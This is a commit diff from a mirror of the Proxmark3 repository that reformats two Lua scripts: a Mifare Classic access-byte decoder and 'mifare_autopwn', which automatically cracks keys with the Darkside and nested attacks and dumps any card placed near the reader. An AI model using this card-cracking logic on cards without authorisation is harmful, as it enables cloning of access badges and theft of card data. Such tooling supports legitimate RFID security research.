mirror of
https://github.com/RfidResearchGroup/proxmark3.git
synced 2025-01-09 17:56:53 +08:00
next
This commit is contained in:
iceman1001
parent
c92a58acf3
commit
47fbb557b4
2 changed files with 57 additions and 45 deletions
|
|
@ -2,11 +2,13 @@ local getopt = require('getopt')
|
|||
|
||||
copyright = ''
|
||||
author = "Neuromancer"
|
||||
version = 'v1.0.0'
|
||||
version = 'v1.0.1'
|
||||
desc = [[
|
||||
This script tries to decode Mifare Classic Access bytes
|
||||
]]
|
||||
example = 'script run mifare_access -a 7F0F0869'
|
||||
example = [[
|
||||
1. script run mifare_access -a 7F0F0869
|
||||
]]
|
||||
usage = [[
|
||||
script run mifare_access -h -a <access bytes>
|
||||
|
||||
|
|
@ -24,20 +26,21 @@ local rshift = bit32.rshift
|
|||
-- A debug printout-function
|
||||
local function dbg(args)
|
||||
if not DEBUG then return end
|
||||
if type(args) == "table" then
|
||||
if type(args) == 'table' then
|
||||
local i = 1
|
||||
while args[i] do
|
||||
dbg(args[i])
|
||||
i = i+1
|
||||
end
|
||||
else
|
||||
print("###", args)
|
||||
print('###', args)
|
||||
end
|
||||
end
|
||||
---
|
||||
-- This is only meant to be used when errors occur
|
||||
local function oops(err)
|
||||
print("ERROR: ",err)
|
||||
print('ERROR:', err)
|
||||
core.clearCommandBuffer()
|
||||
return nil, err
|
||||
end
|
||||
---
|
||||
|
|
@ -49,6 +52,7 @@ local function help()
|
|||
print(desc)
|
||||
print('Example usage')
|
||||
print(example)
|
||||
print(usage)
|
||||
end
|
||||
|
||||
local access_condition_sector_trailer = {}
|
||||
|
|
@ -81,13 +85,13 @@ local function main(args)
|
|||
|
||||
-- Read the parameters
|
||||
for o, a in getopt.getopt(args, 'ha:') do
|
||||
if o == "h" then return help() end
|
||||
if o == "a" then access = a end
|
||||
if o == 'h' then return help() end
|
||||
if o == 'a' then access = a end
|
||||
end
|
||||
|
||||
if access == nil then return oops('empty ACCESS CONDITIONS') end
|
||||
if #access == 0 then return oops('empty ACCESS CONDITIONS') end
|
||||
if #access ~= 8 then return oops("Wrong length. Should be 4 hex bytes ACCESS CONDITIONS (e.g. 7F0F0869)") end
|
||||
if #access ~= 8 then return oops('Wrong length. Should be 4 hex bytes ACCESS CONDITIONS (e.g. 7F0F0869)') end
|
||||
|
||||
local c2_b = tonumber(string.sub(access, 1, 1), 16)
|
||||
local c1_b = tonumber(string.sub(access, 2, 2), 16)
|
||||
|
|
@ -97,34 +101,34 @@ local function main(args)
|
|||
local c2 = tonumber(string.sub(access, 6, 6), 16)
|
||||
local gpb = string.sub(access, 7, 8)
|
||||
|
||||
if bxor(c1, c1_b) ~= 0xF then print("!!! bitflip in c1") end
|
||||
if bxor(c2, c2_b) ~= 0xF then print("!!! bitflip in c2") end
|
||||
if bxor(c3, c3_b) ~= 0xF then print("!!! bitflip in c3") end
|
||||
if bxor(c1, c1_b) ~= 0xF then print('!!! bitflip in c1') end
|
||||
if bxor(c2, c2_b) ~= 0xF then print('!!! bitflip in c2') end
|
||||
if bxor(c3, c3_b) ~= 0xF then print('!!! bitflip in c3') end
|
||||
|
||||
local ab = c1 * 256 + c2 * 16 + c3
|
||||
|
||||
for block = 0,3 do
|
||||
print("--> block "..block)
|
||||
print('--> block '..block)
|
||||
-- mask bits for block
|
||||
local abi = band(rshift(ab, block), 0x111)
|
||||
-- compress bits
|
||||
abi = band(abi + rshift(abi, 3) + rshift(abi, 6),7)
|
||||
-- print(abi)
|
||||
if block == 3 then
|
||||
print(" KEYSECXA read: "..access_condition_sector_trailer[abi][1])
|
||||
print(" KEYSECXA write: "..access_condition_sector_trailer[abi][2])
|
||||
print(" ACCESS COND. read: "..access_condition_sector_trailer[abi][3])
|
||||
print("ACCESS COND. write: "..access_condition_sector_trailer[abi][4])
|
||||
print(" KEYSECXB read: "..access_condition_sector_trailer[abi][5])
|
||||
print(" KEYSECXB write: "..access_condition_sector_trailer[abi][6])
|
||||
print(' KEYSECXA read: '..access_condition_sector_trailer[abi][1])
|
||||
print(' KEYSECXA write: '..access_condition_sector_trailer[abi][2])
|
||||
print(' ACCESS COND. read: '..access_condition_sector_trailer[abi][3])
|
||||
print('ACCESS COND. write: '..access_condition_sector_trailer[abi][4])
|
||||
print(' KEYSECXB read: '..access_condition_sector_trailer[abi][5])
|
||||
print(' KEYSECXB write: '..access_condition_sector_trailer[abi][6])
|
||||
else
|
||||
print(" read: "..access_condition_data_block[abi][1])
|
||||
print(" write: "..access_condition_data_block[abi][2])
|
||||
print(" inc: "..access_condition_data_block[abi][3])
|
||||
print("decr, transfer, restore: "..access_condition_data_block[abi][4])
|
||||
print(' read: '..access_condition_data_block[abi][1])
|
||||
print(' write: '..access_condition_data_block[abi][2])
|
||||
print(' inc: '..access_condition_data_block[abi][3])
|
||||
print('decr, transfer, restore: '..access_condition_data_block[abi][4])
|
||||
end
|
||||
end
|
||||
|
||||
print("GPB: "..gpb)
|
||||
print('GPB: '..gpb)
|
||||
end
|
||||
main(args)
|
||||
|
|
|
|||
|
|
@ -3,14 +3,18 @@ local lib14a = require('read14a')
|
|||
local cmds = require('commands')
|
||||
local utils = require('utils')
|
||||
|
||||
example = "script run mifare_autopwn"
|
||||
copyright = ''
|
||||
author = "Martin Holst Swende"
|
||||
desc =
|
||||
[[
|
||||
version = 'v1.0.1'
|
||||
desc = [[
|
||||
This is a script which automates cracking and dumping mifare classic cards. It sets itself into
|
||||
'listening'-mode, after which it cracks and dumps any mifare classic card that you
|
||||
place by the device.
|
||||
|
||||
]]
|
||||
example = [[
|
||||
script run mifare_autopwn
|
||||
]]
|
||||
usage = [[
|
||||
Arguments:
|
||||
-h this help
|
||||
-d debug logging on
|
||||
|
|
@ -33,7 +37,6 @@ local DEBUG = false
|
|||
-- A debug printout-function
|
||||
local function dbg(args)
|
||||
if not DEBUG then return end
|
||||
|
||||
if type(args) == 'table' then
|
||||
local i = 1
|
||||
while result[i] do
|
||||
|
|
@ -47,15 +50,20 @@ end
|
|||
---
|
||||
-- This is only meant to be used when errors occur
|
||||
local function oops(err)
|
||||
print("ERROR: ",err)
|
||||
return nil,err
|
||||
print('ERROR:', err)
|
||||
core.clearCommandBuffer()
|
||||
return nil, err
|
||||
end
|
||||
---
|
||||
-- Usage help
|
||||
local function help()
|
||||
print(copyright)
|
||||
print(author)
|
||||
print(version)
|
||||
print(desc)
|
||||
print("Example usage")
|
||||
print('Example usage')
|
||||
print(example)
|
||||
print(usage)
|
||||
end
|
||||
---
|
||||
-- Waits for a mifare card to be placed within the vicinity of the reader.
|
||||
|
|
@ -67,7 +75,7 @@ local function wait_for_mifare()
|
|||
if res then return res end
|
||||
-- err means that there was no response from card
|
||||
end
|
||||
return nil, "Aborted by user"
|
||||
return nil, 'Aborted by user'
|
||||
end
|
||||
|
||||
local function nested(key,sak)
|
||||
|
|
@ -85,7 +93,7 @@ local function nested(key,sak)
|
|||
else
|
||||
print("I don't know how many sectors there are on this type of card, defaulting to 16")
|
||||
end
|
||||
local cmd = string.format("hf mf nested %d 0 A %s d", typ, key)
|
||||
local cmd = string.format('hf mf nested %d 0 A %s d', typ, key)
|
||||
core.console(cmd)
|
||||
end
|
||||
|
||||
|
|
@ -146,14 +154,14 @@ local function main(args)
|
|||
local print_message = true
|
||||
-- Read the parameters
|
||||
for o, a in getopt.getopt(args, 'hdk:') do
|
||||
if o == "h" then help() return end
|
||||
if o == "d" then DEBUG = true end
|
||||
if o == 'h' then help() return end
|
||||
if o == 'd' then DEBUG = true end
|
||||
if o == 'k' then key = a end
|
||||
end
|
||||
|
||||
while not exit do
|
||||
if print_message then
|
||||
print("Waiting for card or press any key to stop")
|
||||
print('Waiting for card or press any key to stop')
|
||||
print_message = false
|
||||
end
|
||||
res, err = wait_for_mifare()
|
||||
|
|
@ -168,29 +176,29 @@ local function main(args)
|
|||
|
||||
-- check if PRNG is WEAK
|
||||
if perform_prng_test() == 1 then
|
||||
print("Card found, commencing crack on UID", uid)
|
||||
print('Card found, commencing crack on UID', uid)
|
||||
|
||||
if #key == 12 then
|
||||
print("Using key: "..key);
|
||||
print('Using key: '..key);
|
||||
else
|
||||
-- Crack it
|
||||
local cnt
|
||||
err, res = core.mfDarkside()
|
||||
if err == -1 then return oops("Button pressed. Aborted.")
|
||||
elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).")
|
||||
elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).")
|
||||
if err == -1 then return oops('Button pressed. Aborted.')
|
||||
elseif err == -2 then return oops([[Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).]])
|
||||
elseif err == -3 then return oops([[Card is not vulnerable to Darkside attack (its random number generator is not predictable).]])
|
||||
elseif err == -4 then return oops([[
|
||||
Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown
|
||||
generating polynomial with 16 effective bits only, but shows unexpected behaviour.]])
|
||||
elseif err == -5 then return oops("Aborted via keyboard.")
|
||||
elseif err == -5 then return oops('Aborted via keyboard.')
|
||||
end
|
||||
-- The key is actually 8 bytes, so a
|
||||
-- 6-byte key is sent as 00XXXXXX
|
||||
-- This means we unpack it as first
|
||||
-- two bytes, then six bytes actual key data
|
||||
-- We can discard first and second return values
|
||||
_,_,key = bin.unpack("H2H6",res)
|
||||
print("Found valid key: "..key);
|
||||
_,_,key = bin.unpack('H2H6',res)
|
||||
print('Found valid key: '..key);
|
||||
end
|
||||
-- Use nested attack
|
||||
nested(key, sak)
|
||||
|
|
@ -199,7 +207,7 @@ local function main(args)
|
|||
|
||||
if #key == 12 then exit = true end
|
||||
else
|
||||
print("Card found, darkside attack useless PRNG hardend on UID", uid)
|
||||
print('Card found, darkside attack useless PRNG hardend on UID', uid)
|
||||
end
|
||||
print_message = true
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in a new issue